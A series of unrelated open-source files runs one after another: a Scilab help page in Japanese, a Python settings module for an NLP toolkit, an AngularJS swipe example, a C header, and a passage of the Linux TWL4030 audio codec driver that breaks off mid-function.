        # Static response body; the trailing \n keeps curl output tidy.
        return 200 "Welcome to this authenticated web service.\n";
    }
}
{ "pile_set_name": "Github" }
foo { key = 7 } foo { foo = "bar" }
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <refentry xmlns="http://docbook.org/ns/docbook" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:svg="http://www.w3.org/2000/svg" xmlns:mml="http://www.w3.org/1998/Math/MathML" xmlns:db="http://docbook.org/ns/docbook" xmlns:scilab="http://www.scilab.org" xml:lang="ja" xml:id="ell1mag"> <refnamediv> <refname>ell1mag</refname> <refpurpose>楕円フィルタの振幅</refpurpose> </refnamediv> <refsynopsisdiv> <title>呼び出し手順</title> <synopsis>[v]=ell1mag(eps,m1,z)</synopsis> </refsynopsisdiv> <refsection> <title>引数</title> <variablelist> <varlistentry> <term>eps</term> <listitem> <para> 通過域のリップル=<literal>1/(1+eps^2)</literal> </para> </listitem> </varlistentry> <varlistentry> <term>m1</term> <listitem> <para> 阻止域のリップル=<literal>1/(1+(eps^2)/m1)</literal> </para> </listitem> </varlistentry> <varlistentry> <term>z</term> <listitem> <para>複素平面上の標本ベクトルの値</para> </listitem> </varlistentry> <varlistentry> <term>v</term> <listitem> <para>標本点における楕円フィルタの値</para> </listitem> </varlistentry> </variablelist> </refsection> <refsection> <title>説明</title> <para> 楕円フィルタの二乗振幅を得る際に使用される関数. 通常は,<literal>m1=eps*eps/(a*a-1)</literal>です. <literal>s=ellipj(z,m1)</literal>として, <literal>v=real(ones(z)./(ones(z)+eps*eps*s.*s))</literal>を返します. </para> </refsection> <refsection> <title>例</title> <programlisting role="example"><![CDATA[ deff('[alpha,BeTa]=alpha_beta(n,m,m1)',... 'if 2*int(n/2)==n then, BeTa=K1; else, BeTa=0;end;'+... 'alpha=%k(1-m1)/%k(1-m);') epsilon=0.1;A=10; //リップルパラメータ m1=(epsilon*epsilon)/(A*A-1);n=5;omegac=6; m=find_freq(epsilon,A,n);omegar = omegac/sqrt(m) %k(1-m1)*%k(m)/(%k(m1)*%k(1-m))-n //チェック... [alpha,Beta]=alpha_beta(n,m,m1) alpha*delip(1,sqrt(m))-n*%k(m1) //チェック sample=0:0.01:20; //等高線に正の実軸をマップ... z=alpha*delip(sample/omegac,sqrt(m))+Beta*ones(sample); plot(sample,ell1mag(epsilon,m1,z)) ]]></programlisting> <scilab:image><![CDATA[ deff('[alpha,BeTa]=alpha_beta(n,m,m1)',... 'if 2*int(n/2)==n then, BeTa=K1; else, BeTa=0;end;'+... 
'alpha=%k(1-m1)/%k(1-m);') epsilon=0.1;A=10; //ripple parameters m1=(epsilon*epsilon)/(A*A-1);n=5;omegac=6; m=find_freq(epsilon,A,n);omegar = omegac/sqrt(m) %k(1-m1)*%k(m)/(%k(m1)*%k(1-m))-n //Check... [alpha,Beta]=alpha_beta(n,m,m1) alpha*delip(1,sqrt(m))-n*%k(m1) //Check samples=0:0.01:20; //Now we map the positive real axis into the contour... z=alpha*delip(samples/omegac,sqrt(m))+Beta*ones(samples); plot(samples,ell1mag(epsilon,m1,z)) ]]> </scilab:image> </refsection> <refsection role="see also"> <title>参照</title> <simplelist type="inline"> <member> <link linkend="buttmag">buttmag</link> </member> </simplelist> </refsection> </refentry>
{ "pile_set_name": "Github" }
二便 18 19 身体部位 12 42牙齿 24 30 身体部位 松动 31 32 症状和体征 前臂 37 38 身体部位 红肿 45 46 症状和体征 口腔内黏膜 48 52 身体部位 12 42牙齿 56 62 身体部位 松动 63 64 症状和体征
{ "pile_set_name": "Github" }
/*
 * balde: A microframework for C based on GLib and bad intentions.
 * Copyright (C) 2013-2017 Rafael G. Martins <[email protected]>
 *
 * This program can be distributed under the terms of the LGPL-2 License.
 * See the file COPYING.
 */

#ifndef _BALDE_SAPI_SCGI_PRIVATE_H
#define _BALDE_SAPI_SCGI_PRIVATE_H

#include <glib.h>
#include <gio/gio.h>
#include "../balde.h"

/*
 * Parse one SCGI request read from `istream` into a balde request
 * environment for application `app`.
 * NOTE(review): ownership of the returned balde_request_env_t (who frees
 * it) is not visible from this header — confirm in the implementation.
 */
balde_request_env_t* balde_sapi_scgi_parse_request(balde_app_t *app, GInputStream *istream);

#endif /* _BALDE_SAPI_SCGI_PRIVATE_H */
{ "pile_set_name": "Github" }
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT license.

"""Global settings: supported languages/problems/metrics and constant classes.

This module defines the enumerations and lookup tables that the rest of the
toolkit consults to validate configurations, plus a small metaclass-based
mechanism (Constant / ConstantStatic / Setting) for read-only constants.
"""

# add the project root to python path
import os
import sys
sys.path.append(sys.path[0])

from enum import Enum
import nltk

version = '1.1.0'

# Supported languages
LanguageTypes = Enum('LanguageTypes', ('english', 'chinese'))

# Supported problems
ProblemTypes = Enum('ProblemTypes', ('sequence_tagging', 'classification', 'regression', 'mrc'))

# Supported sequence tagging scheme
TaggingSchemes = Enum('TaggingSchemes', ('BIO', 'BIOES'))

# supported metrics: maps each problem type to the set of metric names that
# may appear in a configuration for that problem.
SupportedMetrics = {
    ProblemTypes.sequence_tagging: set(['seq_tag_f1', 'seq_tag_accuracy']),
    ProblemTypes.classification: set(['auc', 'accuracy', 'f1', 'macro_f1', 'macro_precision',
        'macro_recall', 'micro_f1', 'micro_precision', 'micro_recall', 'weighted_f1',
        'weighted_precision', 'weighted_recall']),
    # In addition, for auc in multi-type classification,
    # if there is a type named 1, auc@1 means use 1 as the positive label
    # auc@average means enumerate all the types as the positive label and obtain the average auc.
    ProblemTypes.regression: set(['MSE', 'RMSE']),
    ProblemTypes.mrc: set(['f1', 'em']),
}

# Supported prediction types: what columns a model may emit per problem type.
PredictionTypes = {
    ProblemTypes.sequence_tagging: set(['prediction']),
    ProblemTypes.classification: set(['prediction', 'confidence']),
    # In addition, if there is a type named positive, confidence@positive means the confidence of positive
    ProblemTypes.regression: set(['prediction']),
    ProblemTypes.mrc: set(['prediction']),
}

# Supported multi_loss operation
# (single-string argument: Enum splits it into the one member 'weighted_sum')
LossOperationType = Enum('LossOperationType', ('weighted_sum'))

# If prediction_field is not defined, use the default fields below
DefaultPredictionFields = {
    ProblemTypes.sequence_tagging: ['prediction'],
    ProblemTypes.classification: ['prediction', 'confidence'],
    ProblemTypes.regression: ['prediction'],
    ProblemTypes.mrc: ['prediction'],
}

# nltk's models: look up bundled NLTK data relative to the working directory
nltk.data.path.append(os.path.join(os.getcwd(), 'dataset', 'nltk_data'))


class Constant(type):
    """Metaclass that forbids reassignment of class attributes."""

    def __setattr__(self, name, value):
        # Any attempt to set an attribute on a class using this metaclass fails.
        raise AttributeError("Class %s can not be modified"%(self.__name__))


class ConstantStatic(metaclass=Constant):
    """Base class for pure-constant holders: immutable and non-instantiable."""

    def __init__(self, *args,**kwargs):
        raise Exception("Class %s can not be instantiated"%(self.__class__.__name__))


class Setting(ConstantStatic):
    """Read-only file-name and key constants used by the caching layer."""
    # cache
    ## cencoding (cache_encoding)
    # NOTE(review): "cencodig" below is missing an 'n' — likely a typo, but
    # renaming would break existing references; confirm before changing.
    cencodig_index_file_name = 'index.json'
    cencoding_index_md5_file_name = 'index_md5.json'
    cencoding_file_name_pattern = 'encoding_cache_%s.pkl'
    cencoding_key_finish = 'finish'
    cencoding_key_index = 'index'
    cencoding_key_legal_cnt = 'legal_line_cnt'
    cencoding_key_illegal_cnt = 'illegal_line_cnt'
{ "pile_set_name": "Github" }
<!doctype html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Example - example-ng-swipe-right-jquery</title>
  <script src="../../components/jquery-3.1.1/jquery.js"></script>
  <script src="../../../angular.js"></script>
  <script src="../../../angular-touch.js"></script>
  <script src="script.js"></script>
</head>
<body ng-app="ngSwipeRightExample">
  <!-- Swiping left on the list item sets showActions, hiding the content
       and revealing the action buttons; swiping right on the buttons
       restores the content. -->
  <div ng-show="!showActions" ng-swipe-left="showActions = true">
    Some list content, like an email in the inbox
  </div>
  <div ng-show="showActions" ng-swipe-right="showActions = false">
    <button ng-click="reply()">Reply</button>
    <button ng-click="delete()">Delete</button>
  </div>
</body>
</html>
{ "pile_set_name": "Github" }
// SPDX-License-Identifier: GPL-2.0-only /* * ALSA SoC TWL4030 codec driver * * Author: Steve Sakoman, <[email protected]> */ #include <linux/module.h> #include <linux/moduleparam.h> #include <linux/init.h> #include <linux/delay.h> #include <linux/pm.h> #include <linux/i2c.h> #include <linux/platform_device.h> #include <linux/of.h> #include <linux/of_gpio.h> #include <linux/mfd/twl.h> #include <linux/slab.h> #include <linux/gpio.h> #include <sound/core.h> #include <sound/pcm.h> #include <sound/pcm_params.h> #include <sound/soc.h> #include <sound/initval.h> #include <sound/tlv.h> /* Register descriptions are here */ #include <linux/mfd/twl4030-audio.h> /* TWL4030 PMBR1 Register */ #define TWL4030_PMBR1_REG 0x0D /* TWL4030 PMBR1 Register GPIO6 mux bits */ #define TWL4030_GPIO6_PWM0_MUTE(value) ((value & 0x03) << 2) #define TWL4030_CACHEREGNUM (TWL4030_REG_MISC_SET_2 + 1) /* codec private data */ struct twl4030_priv { unsigned int codec_powered; /* reference counts of AIF/APLL users */ unsigned int apll_enabled; struct snd_pcm_substream *master_substream; struct snd_pcm_substream *slave_substream; unsigned int configured; unsigned int rate; unsigned int sample_bits; unsigned int channels; unsigned int sysclk; /* Output (with associated amp) states */ u8 hsl_enabled, hsr_enabled; u8 earpiece_enabled; u8 predrivel_enabled, predriver_enabled; u8 carkitl_enabled, carkitr_enabled; u8 ctl_cache[TWL4030_REG_PRECKR_CTL - TWL4030_REG_EAR_CTL + 1]; struct twl4030_codec_data *pdata; }; static void tw4030_init_ctl_cache(struct twl4030_priv *twl4030) { int i; u8 byte; for (i = TWL4030_REG_EAR_CTL; i <= TWL4030_REG_PRECKR_CTL; i++) { twl_i2c_read_u8(TWL4030_MODULE_AUDIO_VOICE, &byte, i); twl4030->ctl_cache[i - TWL4030_REG_EAR_CTL] = byte; } } static unsigned int twl4030_read(struct snd_soc_component *component, unsigned int reg) { struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); u8 value = 0; if (reg >= TWL4030_CACHEREGNUM) return -EIO; switch (reg) { case 
TWL4030_REG_EAR_CTL: case TWL4030_REG_PREDL_CTL: case TWL4030_REG_PREDR_CTL: case TWL4030_REG_PRECKL_CTL: case TWL4030_REG_PRECKR_CTL: case TWL4030_REG_HS_GAIN_SET: value = twl4030->ctl_cache[reg - TWL4030_REG_EAR_CTL]; break; default: twl_i2c_read_u8(TWL4030_MODULE_AUDIO_VOICE, &value, reg); break; } return value; } static bool twl4030_can_write_to_chip(struct twl4030_priv *twl4030, unsigned int reg) { bool write_to_reg = false; /* Decide if the given register can be written */ switch (reg) { case TWL4030_REG_EAR_CTL: if (twl4030->earpiece_enabled) write_to_reg = true; break; case TWL4030_REG_PREDL_CTL: if (twl4030->predrivel_enabled) write_to_reg = true; break; case TWL4030_REG_PREDR_CTL: if (twl4030->predriver_enabled) write_to_reg = true; break; case TWL4030_REG_PRECKL_CTL: if (twl4030->carkitl_enabled) write_to_reg = true; break; case TWL4030_REG_PRECKR_CTL: if (twl4030->carkitr_enabled) write_to_reg = true; break; case TWL4030_REG_HS_GAIN_SET: if (twl4030->hsl_enabled || twl4030->hsr_enabled) write_to_reg = true; break; default: /* All other register can be written */ write_to_reg = true; break; } return write_to_reg; } static int twl4030_write(struct snd_soc_component *component, unsigned int reg, unsigned int value) { struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); /* Update the ctl cache */ switch (reg) { case TWL4030_REG_EAR_CTL: case TWL4030_REG_PREDL_CTL: case TWL4030_REG_PREDR_CTL: case TWL4030_REG_PRECKL_CTL: case TWL4030_REG_PRECKR_CTL: case TWL4030_REG_HS_GAIN_SET: twl4030->ctl_cache[reg - TWL4030_REG_EAR_CTL] = value; break; default: break; } if (twl4030_can_write_to_chip(twl4030, reg)) return twl_i2c_write_u8(TWL4030_MODULE_AUDIO_VOICE, value, reg); return 0; } static inline void twl4030_wait_ms(int time) { if (time < 60) { time *= 1000; usleep_range(time, time + 500); } else { msleep(time); } } static void twl4030_codec_enable(struct snd_soc_component *component, int enable) { struct twl4030_priv *twl4030 = 
snd_soc_component_get_drvdata(component); int mode; if (enable == twl4030->codec_powered) return; if (enable) mode = twl4030_audio_enable_resource(TWL4030_AUDIO_RES_POWER); else mode = twl4030_audio_disable_resource(TWL4030_AUDIO_RES_POWER); if (mode >= 0) twl4030->codec_powered = enable; /* REVISIT: this delay is present in TI sample drivers */ /* but there seems to be no TRM requirement for it */ udelay(10); } static void twl4030_setup_pdata_of(struct twl4030_codec_data *pdata, struct device_node *node) { int value; of_property_read_u32(node, "ti,digimic_delay", &pdata->digimic_delay); of_property_read_u32(node, "ti,ramp_delay_value", &pdata->ramp_delay_value); of_property_read_u32(node, "ti,offset_cncl_path", &pdata->offset_cncl_path); if (!of_property_read_u32(node, "ti,hs_extmute", &value)) pdata->hs_extmute = value; pdata->hs_extmute_gpio = of_get_named_gpio(node, "ti,hs_extmute_gpio", 0); if (gpio_is_valid(pdata->hs_extmute_gpio)) pdata->hs_extmute = 1; } static struct twl4030_codec_data *twl4030_get_pdata(struct snd_soc_component *component) { struct twl4030_codec_data *pdata = dev_get_platdata(component->dev); struct device_node *twl4030_codec_node = NULL; twl4030_codec_node = of_get_child_by_name(component->dev->parent->of_node, "codec"); if (!pdata && twl4030_codec_node) { pdata = devm_kzalloc(component->dev, sizeof(struct twl4030_codec_data), GFP_KERNEL); if (!pdata) { of_node_put(twl4030_codec_node); return NULL; } twl4030_setup_pdata_of(pdata, twl4030_codec_node); of_node_put(twl4030_codec_node); } return pdata; } static void twl4030_init_chip(struct snd_soc_component *component) { struct twl4030_codec_data *pdata; struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); u8 reg, byte; int i = 0; pdata = twl4030_get_pdata(component); if (pdata && pdata->hs_extmute) { if (gpio_is_valid(pdata->hs_extmute_gpio)) { int ret; if (!pdata->hs_extmute_gpio) dev_warn(component->dev, "Extmute GPIO is 0 is this correct?\n"); ret = 
gpio_request_one(pdata->hs_extmute_gpio, GPIOF_OUT_INIT_LOW, "hs_extmute"); if (ret) { dev_err(component->dev, "Failed to get hs_extmute GPIO\n"); pdata->hs_extmute_gpio = -1; } } else { u8 pin_mux; /* Set TWL4030 GPIO6 as EXTMUTE signal */ twl_i2c_read_u8(TWL4030_MODULE_INTBR, &pin_mux, TWL4030_PMBR1_REG); pin_mux &= ~TWL4030_GPIO6_PWM0_MUTE(0x03); pin_mux |= TWL4030_GPIO6_PWM0_MUTE(0x02); twl_i2c_write_u8(TWL4030_MODULE_INTBR, pin_mux, TWL4030_PMBR1_REG); } } /* Initialize the local ctl register cache */ tw4030_init_ctl_cache(twl4030); /* anti-pop when changing analog gain */ reg = twl4030_read(component, TWL4030_REG_MISC_SET_1); twl4030_write(component, TWL4030_REG_MISC_SET_1, reg | TWL4030_SMOOTH_ANAVOL_EN); twl4030_write(component, TWL4030_REG_OPTION, TWL4030_ATXL1_EN | TWL4030_ATXR1_EN | TWL4030_ARXL2_EN | TWL4030_ARXR2_EN); /* REG_ARXR2_APGA_CTL reset according to the TRM: 0dB, DA_EN */ twl4030_write(component, TWL4030_REG_ARXR2_APGA_CTL, 0x32); /* Machine dependent setup */ if (!pdata) return; twl4030->pdata = pdata; reg = twl4030_read(component, TWL4030_REG_HS_POPN_SET); reg &= ~TWL4030_RAMP_DELAY; reg |= (pdata->ramp_delay_value << 2); twl4030_write(component, TWL4030_REG_HS_POPN_SET, reg); /* initiate offset cancellation */ twl4030_codec_enable(component, 1); reg = twl4030_read(component, TWL4030_REG_ANAMICL); reg &= ~TWL4030_OFFSET_CNCL_SEL; reg |= pdata->offset_cncl_path; twl4030_write(component, TWL4030_REG_ANAMICL, reg | TWL4030_CNCL_OFFSET_START); /* * Wait for offset cancellation to complete. * Since this takes a while, do not slam the i2c. * Start polling the status after ~20ms. 
*/ msleep(20); do { usleep_range(1000, 2000); twl_set_regcache_bypass(TWL4030_MODULE_AUDIO_VOICE, true); twl_i2c_read_u8(TWL4030_MODULE_AUDIO_VOICE, &byte, TWL4030_REG_ANAMICL); twl_set_regcache_bypass(TWL4030_MODULE_AUDIO_VOICE, false); } while ((i++ < 100) && ((byte & TWL4030_CNCL_OFFSET_START) == TWL4030_CNCL_OFFSET_START)); twl4030_codec_enable(component, 0); } static void twl4030_apll_enable(struct snd_soc_component *component, int enable) { struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); if (enable) { twl4030->apll_enabled++; if (twl4030->apll_enabled == 1) twl4030_audio_enable_resource( TWL4030_AUDIO_RES_APLL); } else { twl4030->apll_enabled--; if (!twl4030->apll_enabled) twl4030_audio_disable_resource( TWL4030_AUDIO_RES_APLL); } } /* Earpiece */ static const struct snd_kcontrol_new twl4030_dapm_earpiece_controls[] = { SOC_DAPM_SINGLE("Voice", TWL4030_REG_EAR_CTL, 0, 1, 0), SOC_DAPM_SINGLE("AudioL1", TWL4030_REG_EAR_CTL, 1, 1, 0), SOC_DAPM_SINGLE("AudioL2", TWL4030_REG_EAR_CTL, 2, 1, 0), SOC_DAPM_SINGLE("AudioR1", TWL4030_REG_EAR_CTL, 3, 1, 0), }; /* PreDrive Left */ static const struct snd_kcontrol_new twl4030_dapm_predrivel_controls[] = { SOC_DAPM_SINGLE("Voice", TWL4030_REG_PREDL_CTL, 0, 1, 0), SOC_DAPM_SINGLE("AudioL1", TWL4030_REG_PREDL_CTL, 1, 1, 0), SOC_DAPM_SINGLE("AudioL2", TWL4030_REG_PREDL_CTL, 2, 1, 0), SOC_DAPM_SINGLE("AudioR2", TWL4030_REG_PREDL_CTL, 3, 1, 0), }; /* PreDrive Right */ static const struct snd_kcontrol_new twl4030_dapm_predriver_controls[] = { SOC_DAPM_SINGLE("Voice", TWL4030_REG_PREDR_CTL, 0, 1, 0), SOC_DAPM_SINGLE("AudioR1", TWL4030_REG_PREDR_CTL, 1, 1, 0), SOC_DAPM_SINGLE("AudioR2", TWL4030_REG_PREDR_CTL, 2, 1, 0), SOC_DAPM_SINGLE("AudioL2", TWL4030_REG_PREDR_CTL, 3, 1, 0), }; /* Headset Left */ static const struct snd_kcontrol_new twl4030_dapm_hsol_controls[] = { SOC_DAPM_SINGLE("Voice", TWL4030_REG_HS_SEL, 0, 1, 0), SOC_DAPM_SINGLE("AudioL1", TWL4030_REG_HS_SEL, 1, 1, 0), SOC_DAPM_SINGLE("AudioL2", 
TWL4030_REG_HS_SEL, 2, 1, 0), }; /* Headset Right */ static const struct snd_kcontrol_new twl4030_dapm_hsor_controls[] = { SOC_DAPM_SINGLE("Voice", TWL4030_REG_HS_SEL, 3, 1, 0), SOC_DAPM_SINGLE("AudioR1", TWL4030_REG_HS_SEL, 4, 1, 0), SOC_DAPM_SINGLE("AudioR2", TWL4030_REG_HS_SEL, 5, 1, 0), }; /* Carkit Left */ static const struct snd_kcontrol_new twl4030_dapm_carkitl_controls[] = { SOC_DAPM_SINGLE("Voice", TWL4030_REG_PRECKL_CTL, 0, 1, 0), SOC_DAPM_SINGLE("AudioL1", TWL4030_REG_PRECKL_CTL, 1, 1, 0), SOC_DAPM_SINGLE("AudioL2", TWL4030_REG_PRECKL_CTL, 2, 1, 0), }; /* Carkit Right */ static const struct snd_kcontrol_new twl4030_dapm_carkitr_controls[] = { SOC_DAPM_SINGLE("Voice", TWL4030_REG_PRECKR_CTL, 0, 1, 0), SOC_DAPM_SINGLE("AudioR1", TWL4030_REG_PRECKR_CTL, 1, 1, 0), SOC_DAPM_SINGLE("AudioR2", TWL4030_REG_PRECKR_CTL, 2, 1, 0), }; /* Handsfree Left */ static const char *twl4030_handsfreel_texts[] = {"Voice", "AudioL1", "AudioL2", "AudioR2"}; static SOC_ENUM_SINGLE_DECL(twl4030_handsfreel_enum, TWL4030_REG_HFL_CTL, 0, twl4030_handsfreel_texts); static const struct snd_kcontrol_new twl4030_dapm_handsfreel_control = SOC_DAPM_ENUM("Route", twl4030_handsfreel_enum); /* Handsfree Left virtual mute */ static const struct snd_kcontrol_new twl4030_dapm_handsfreelmute_control = SOC_DAPM_SINGLE_VIRT("Switch", 1); /* Handsfree Right */ static const char *twl4030_handsfreer_texts[] = {"Voice", "AudioR1", "AudioR2", "AudioL2"}; static SOC_ENUM_SINGLE_DECL(twl4030_handsfreer_enum, TWL4030_REG_HFR_CTL, 0, twl4030_handsfreer_texts); static const struct snd_kcontrol_new twl4030_dapm_handsfreer_control = SOC_DAPM_ENUM("Route", twl4030_handsfreer_enum); /* Handsfree Right virtual mute */ static const struct snd_kcontrol_new twl4030_dapm_handsfreermute_control = SOC_DAPM_SINGLE_VIRT("Switch", 1); /* Vibra */ /* Vibra audio path selection */ static const char *twl4030_vibra_texts[] = {"AudioL1", "AudioR1", "AudioL2", "AudioR2"}; static SOC_ENUM_SINGLE_DECL(twl4030_vibra_enum, 
TWL4030_REG_VIBRA_CTL, 2, twl4030_vibra_texts); static const struct snd_kcontrol_new twl4030_dapm_vibra_control = SOC_DAPM_ENUM("Route", twl4030_vibra_enum); /* Vibra path selection: local vibrator (PWM) or audio driven */ static const char *twl4030_vibrapath_texts[] = {"Local vibrator", "Audio"}; static SOC_ENUM_SINGLE_DECL(twl4030_vibrapath_enum, TWL4030_REG_VIBRA_CTL, 4, twl4030_vibrapath_texts); static const struct snd_kcontrol_new twl4030_dapm_vibrapath_control = SOC_DAPM_ENUM("Route", twl4030_vibrapath_enum); /* Left analog microphone selection */ static const struct snd_kcontrol_new twl4030_dapm_analoglmic_controls[] = { SOC_DAPM_SINGLE("Main Mic Capture Switch", TWL4030_REG_ANAMICL, 0, 1, 0), SOC_DAPM_SINGLE("Headset Mic Capture Switch", TWL4030_REG_ANAMICL, 1, 1, 0), SOC_DAPM_SINGLE("AUXL Capture Switch", TWL4030_REG_ANAMICL, 2, 1, 0), SOC_DAPM_SINGLE("Carkit Mic Capture Switch", TWL4030_REG_ANAMICL, 3, 1, 0), }; /* Right analog microphone selection */ static const struct snd_kcontrol_new twl4030_dapm_analogrmic_controls[] = { SOC_DAPM_SINGLE("Sub Mic Capture Switch", TWL4030_REG_ANAMICR, 0, 1, 0), SOC_DAPM_SINGLE("AUXR Capture Switch", TWL4030_REG_ANAMICR, 2, 1, 0), }; /* TX1 L/R Analog/Digital microphone selection */ static const char *twl4030_micpathtx1_texts[] = {"Analog", "Digimic0"}; static SOC_ENUM_SINGLE_DECL(twl4030_micpathtx1_enum, TWL4030_REG_ADCMICSEL, 0, twl4030_micpathtx1_texts); static const struct snd_kcontrol_new twl4030_dapm_micpathtx1_control = SOC_DAPM_ENUM("Route", twl4030_micpathtx1_enum); /* TX2 L/R Analog/Digital microphone selection */ static const char *twl4030_micpathtx2_texts[] = {"Analog", "Digimic1"}; static SOC_ENUM_SINGLE_DECL(twl4030_micpathtx2_enum, TWL4030_REG_ADCMICSEL, 2, twl4030_micpathtx2_texts); static const struct snd_kcontrol_new twl4030_dapm_micpathtx2_control = SOC_DAPM_ENUM("Route", twl4030_micpathtx2_enum); /* Analog bypass for AudioR1 */ static const struct snd_kcontrol_new twl4030_dapm_abypassr1_control = 
SOC_DAPM_SINGLE("Switch", TWL4030_REG_ARXR1_APGA_CTL, 2, 1, 0); /* Analog bypass for AudioL1 */ static const struct snd_kcontrol_new twl4030_dapm_abypassl1_control = SOC_DAPM_SINGLE("Switch", TWL4030_REG_ARXL1_APGA_CTL, 2, 1, 0); /* Analog bypass for AudioR2 */ static const struct snd_kcontrol_new twl4030_dapm_abypassr2_control = SOC_DAPM_SINGLE("Switch", TWL4030_REG_ARXR2_APGA_CTL, 2, 1, 0); /* Analog bypass for AudioL2 */ static const struct snd_kcontrol_new twl4030_dapm_abypassl2_control = SOC_DAPM_SINGLE("Switch", TWL4030_REG_ARXL2_APGA_CTL, 2, 1, 0); /* Analog bypass for Voice */ static const struct snd_kcontrol_new twl4030_dapm_abypassv_control = SOC_DAPM_SINGLE("Switch", TWL4030_REG_VDL_APGA_CTL, 2, 1, 0); /* Digital bypass gain, mute instead of -30dB */ static const DECLARE_TLV_DB_RANGE(twl4030_dapm_dbypass_tlv, 0, 1, TLV_DB_SCALE_ITEM(-3000, 600, 1), 2, 3, TLV_DB_SCALE_ITEM(-2400, 0, 0), 4, 7, TLV_DB_SCALE_ITEM(-1800, 600, 0) ); /* Digital bypass left (TX1L -> RX2L) */ static const struct snd_kcontrol_new twl4030_dapm_dbypassl_control = SOC_DAPM_SINGLE_TLV("Volume", TWL4030_REG_ATX2ARXPGA, 3, 7, 0, twl4030_dapm_dbypass_tlv); /* Digital bypass right (TX1R -> RX2R) */ static const struct snd_kcontrol_new twl4030_dapm_dbypassr_control = SOC_DAPM_SINGLE_TLV("Volume", TWL4030_REG_ATX2ARXPGA, 0, 7, 0, twl4030_dapm_dbypass_tlv); /* * Voice Sidetone GAIN volume control: * from -51 to -10 dB in 1 dB steps (mute instead of -51 dB) */ static DECLARE_TLV_DB_SCALE(twl4030_dapm_dbypassv_tlv, -5100, 100, 1); /* Digital bypass voice: sidetone (VUL -> VDL)*/ static const struct snd_kcontrol_new twl4030_dapm_dbypassv_control = SOC_DAPM_SINGLE_TLV("Volume", TWL4030_REG_VSTPGA, 0, 0x29, 0, twl4030_dapm_dbypassv_tlv); /* * Output PGA builder: * Handle the muting and unmuting of the given output (turning off the * amplifier associated with the output pin) * On mute bypass the reg_cache and write 0 to the register * On unmute: restore the register content from the reg_cache * 
Outputs handled in this way: Earpiece, PreDrivL/R, CarkitL/R */ #define TWL4030_OUTPUT_PGA(pin_name, reg, mask) \ static int pin_name##pga_event(struct snd_soc_dapm_widget *w, \ struct snd_kcontrol *kcontrol, int event) \ { \ struct snd_soc_component *component = snd_soc_dapm_to_component(w->dapm); \ struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); \ \ switch (event) { \ case SND_SOC_DAPM_POST_PMU: \ twl4030->pin_name##_enabled = 1; \ twl4030_write(component, reg, twl4030_read(component, reg)); \ break; \ case SND_SOC_DAPM_POST_PMD: \ twl4030->pin_name##_enabled = 0; \ twl_i2c_write_u8(TWL4030_MODULE_AUDIO_VOICE, 0, reg); \ break; \ } \ return 0; \ } TWL4030_OUTPUT_PGA(earpiece, TWL4030_REG_EAR_CTL, TWL4030_EAR_GAIN); TWL4030_OUTPUT_PGA(predrivel, TWL4030_REG_PREDL_CTL, TWL4030_PREDL_GAIN); TWL4030_OUTPUT_PGA(predriver, TWL4030_REG_PREDR_CTL, TWL4030_PREDR_GAIN); TWL4030_OUTPUT_PGA(carkitl, TWL4030_REG_PRECKL_CTL, TWL4030_PRECKL_GAIN); TWL4030_OUTPUT_PGA(carkitr, TWL4030_REG_PRECKR_CTL, TWL4030_PRECKR_GAIN); static void handsfree_ramp(struct snd_soc_component *component, int reg, int ramp) { unsigned char hs_ctl; hs_ctl = twl4030_read(component, reg); if (ramp) { /* HF ramp-up */ hs_ctl |= TWL4030_HF_CTL_REF_EN; twl4030_write(component, reg, hs_ctl); udelay(10); hs_ctl |= TWL4030_HF_CTL_RAMP_EN; twl4030_write(component, reg, hs_ctl); udelay(40); hs_ctl |= TWL4030_HF_CTL_LOOP_EN; hs_ctl |= TWL4030_HF_CTL_HB_EN; twl4030_write(component, reg, hs_ctl); } else { /* HF ramp-down */ hs_ctl &= ~TWL4030_HF_CTL_LOOP_EN; hs_ctl &= ~TWL4030_HF_CTL_HB_EN; twl4030_write(component, reg, hs_ctl); hs_ctl &= ~TWL4030_HF_CTL_RAMP_EN; twl4030_write(component, reg, hs_ctl); udelay(40); hs_ctl &= ~TWL4030_HF_CTL_REF_EN; twl4030_write(component, reg, hs_ctl); } } static int handsfreelpga_event(struct snd_soc_dapm_widget *w, struct snd_kcontrol *kcontrol, int event) { struct snd_soc_component *component = snd_soc_dapm_to_component(w->dapm); switch (event) { case 
SND_SOC_DAPM_POST_PMU: handsfree_ramp(component, TWL4030_REG_HFL_CTL, 1); break; case SND_SOC_DAPM_POST_PMD: handsfree_ramp(component, TWL4030_REG_HFL_CTL, 0); break; } return 0; } static int handsfreerpga_event(struct snd_soc_dapm_widget *w, struct snd_kcontrol *kcontrol, int event) { struct snd_soc_component *component = snd_soc_dapm_to_component(w->dapm); switch (event) { case SND_SOC_DAPM_POST_PMU: handsfree_ramp(component, TWL4030_REG_HFR_CTL, 1); break; case SND_SOC_DAPM_POST_PMD: handsfree_ramp(component, TWL4030_REG_HFR_CTL, 0); break; } return 0; } static int vibramux_event(struct snd_soc_dapm_widget *w, struct snd_kcontrol *kcontrol, int event) { struct snd_soc_component *component = snd_soc_dapm_to_component(w->dapm); twl4030_write(component, TWL4030_REG_VIBRA_SET, 0xff); return 0; } static int apll_event(struct snd_soc_dapm_widget *w, struct snd_kcontrol *kcontrol, int event) { struct snd_soc_component *component = snd_soc_dapm_to_component(w->dapm); switch (event) { case SND_SOC_DAPM_PRE_PMU: twl4030_apll_enable(component, 1); break; case SND_SOC_DAPM_POST_PMD: twl4030_apll_enable(component, 0); break; } return 0; } static int aif_event(struct snd_soc_dapm_widget *w, struct snd_kcontrol *kcontrol, int event) { struct snd_soc_component *component = snd_soc_dapm_to_component(w->dapm); u8 audio_if; audio_if = twl4030_read(component, TWL4030_REG_AUDIO_IF); switch (event) { case SND_SOC_DAPM_PRE_PMU: /* Enable AIF */ /* enable the PLL before we use it to clock the DAI */ twl4030_apll_enable(component, 1); twl4030_write(component, TWL4030_REG_AUDIO_IF, audio_if | TWL4030_AIF_EN); break; case SND_SOC_DAPM_POST_PMD: /* disable the DAI before we stop it's source PLL */ twl4030_write(component, TWL4030_REG_AUDIO_IF, audio_if & ~TWL4030_AIF_EN); 